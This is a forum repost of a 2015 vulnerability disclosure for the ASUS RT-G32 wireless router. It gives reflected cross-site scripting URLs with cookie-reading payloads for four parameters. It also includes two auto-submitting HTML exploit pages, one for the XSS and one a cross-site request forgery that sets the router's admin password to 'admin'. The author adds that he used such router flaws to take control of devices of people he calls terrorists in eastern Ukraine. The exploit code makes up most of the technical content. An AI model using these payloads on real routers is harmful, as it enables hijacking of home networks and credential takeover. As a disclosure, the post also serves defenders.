Jump to content
Aerosol

ASUS RT-G32 Cross Site Request Forgery / Cross Site Scripting

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Hello list!

There are Cross-Site Scripting and Cross-Site Request Forgery
vulnerabilities in ASUS Wireless Router RT-G32.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: ASUS RT-G32 with different versions of
firmware. I checked in ASUS RT-G32 with firmware versions 2.0.2.6 and
2.0.3.2.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27

http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27

http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27

These vulnerabilities work as via GET, as via POST (work even without
authorization).

ASUS RT-G32 XSS-1.html

<html>
<head>
<title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="next_page" value="'+alert(document.cookie)+'">
<input type="hidden" name="group_id" value="'+alert(document.cookie)+'">
<input type="hidden" name="action_script"
value="'+alert(document.cookie)+'">
<input type="hidden" name="flag" value="'+alert(document.cookie)+'">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

CSRF vulnerability allows to change different settings, including admin's
password. As I showed in this exploit (post-auth).

ASUS RT-G32 CSRF-1.html

<html>
<head>
<title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/start_apply.htm" method="post">
<input type="hidden" name="http_passwd" value="admin">
<input type="hidden" name="http_passwd2" value="admin">
<input type="hidden" name="v_password2" value="admin">
<input type="hidden" name="action_mode" value="+Apply+">
</form>
</body>
</html>

I found this and other routers since summer to take control over terrorists
in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html)
and in many my interviews
(http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).

I mentioned about these vulnerabilities at my site
(http://websecurity.com.ua/7644/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...